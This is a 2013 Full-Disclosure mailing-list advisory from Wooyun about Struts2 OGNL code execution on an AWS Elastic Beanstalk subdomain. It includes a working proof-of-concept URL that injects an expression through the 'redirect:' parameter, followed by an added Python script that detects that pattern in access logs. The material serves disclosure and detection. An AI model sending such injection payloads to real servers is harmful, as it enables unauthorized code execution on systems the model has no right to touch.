
List:       full-disclosure
Subject:    [Full-disclosure] [Wooyun]Amazon elasticbeanstalk code execution
From:       "Wooyun.org" <help.en () wooyun ! org>
Date:       2013-12-26 14:52:43
Message-ID: CAPQ_=KX2g4e4_vBRj9BWt1nWfOihyZrzV3T7FqkuJN98iZL9fQ () mail ! gmail ! com



*From:* http://en.wooyun.org/bugs/wooyun-2013-040


*Abstract:*

AWS Elastic Beanstalk is an even easier way for you to quickly deploy and
manage applications in the AWS cloud. An elasticbeanstalk subdomain is
affected by Struts2 code execution.

*Details:*

PoC (returns [/ok]):
http://jewelopoly.elasticbeanstalk.com/login.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}


-- 
WooYun, an Open and Free Vulnerability Reporting Platform

For more information, please visit http://en.wooyun.org/about.php
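As an added illustration that is not part of the original advisory, the following Python scans web-server access-log lines for the Struts2 parameter-prefix OGNL pattern used in the PoC above (a query parameter whose name starts with `redirect:`, `redirectAction:` or `action:` and carries a `${...}`/`%{...}` expression referencing a `#` context variable). The log lines, client IPs and regexes are constructed assumptions for the demonstration.

```python
import re
from urllib.parse import unquote

# Parameter-name prefixes that vulnerable Struts2 versions evaluated as OGNL;
# the PoC above abuses "redirect:". Compared case-insensitively.
PREFIXES = ("redirect:", "redirectaction:", "action:")
# After URL-decoding: a ${...} or %{...} expression that dereferences a
# context variable with '#', as #context / #w do in the PoC.
OGNL_RE = re.compile(r"[$%]\{[^}]*#")
# Request target from a Combined/Common-format access-log line.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample log lines (hypothetical client IPs); the first one
# carries the request path of the PoC in the advisory.
LOG_LINES = [
    "198.51.100.7 - - [26/Dec/2013:14:52:43 +0000] \"GET /login.action?"
    "redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher."
    "HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),"
    "%23w.close()} HTTP/1.1\" 200 5",
    "198.51.100.8 - - [26/Dec/2013:14:53:01 +0000] \"GET /login.action?"
    "redirect=/home.action HTTP/1.1\" 302 0",
    "198.51.100.9 - - [26/Dec/2013:14:53:10 +0000] \"POST /login.action?"
    "redirect:/home.action HTTP/1.1\" 200 1200",
]

def has_prefix_injection(target: str) -> bool:
    """True if any query parameter of the request target starts with a
    Struts2 action prefix and carries an OGNL expression."""
    _, _, query = target.partition("?")
    for param in query.split("&"):
        decoded = unquote(param)          # %23 -> '#', %3d -> '=', %25 -> '%'
        if decoded.lower().startswith(PREFIXES) and OGNL_RE.search(decoded):
            return True
    return False

def flag_requests(log_lines):
    """Return (client_ip, request_target) for every log line whose request
    matches the injection pattern; a plain 'redirect:/path' is not flagged."""
    hits = []
    for line in log_lines:
        m = REQ_RE.search(line)
        if m and has_prefix_injection(m.group(1)):
            hits.append((line.split(" ", 1)[0], m.group(1)))
    return hits

if __name__ == "__main__":
    for ip, target in flag_requests(LOG_LINES):
        print(f"{ip} {target}")
```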





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

